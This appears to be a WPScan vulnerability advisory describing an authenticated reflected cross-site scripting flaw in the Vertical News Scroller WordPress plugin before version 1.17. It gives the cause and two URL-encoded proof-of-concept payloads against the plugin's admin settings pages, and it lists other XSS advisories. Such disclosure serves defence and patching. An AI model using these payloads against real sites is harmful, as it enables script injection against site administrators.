Vertical News Scroller < 1.17 – Authenticated Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The plugin attempted to fix a reflected Cross-Site Scripting in v1.10, however the changes were insufficient, as sanitize_text_field() was used, but output in an attribute without being escaped.

Proof of Concept

For versions < 1.17: /wp-admin/admin.php?page=Scrollnews-settings&search_term=aa%22+autofocus+onfocus%3Dalert%28%2FXSS%2F%29+b%3D

For versions < 1.10: /wp-admin/admin.php?page=Scrollnews-settings&action=addedit&id=1%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E

Affects Plugins

vertical-news-scroller

Fixed in 1.17

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

70d10e3c-a905-45a3-996e-fc99544aeae5

Timeline

Publicly Published

2021-03-26 (about 4 years ago)

Added

2021-03-26 (about 4 years ago)

Last Updated

2021-03-26 (about 4 years ago)

Other

Published

Title

Published

2025-04-22

Title

List Last Changes < 1.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-12-19

Title

WP Edit Username < 1.0.6 - Admin+ Stored XSS

Published

2025-04-09

Title

Canonical Attachments <= 1.8 - Unauthenticated Stored XSS

Published

2019-05-13

Title

Photo Gallery by 10Web <= 1.5.22 - Authenticated XSS

Published

2024-03-28

Title

All In One Redirection <= 2.2.0 - Reflected Cross-Site Scripting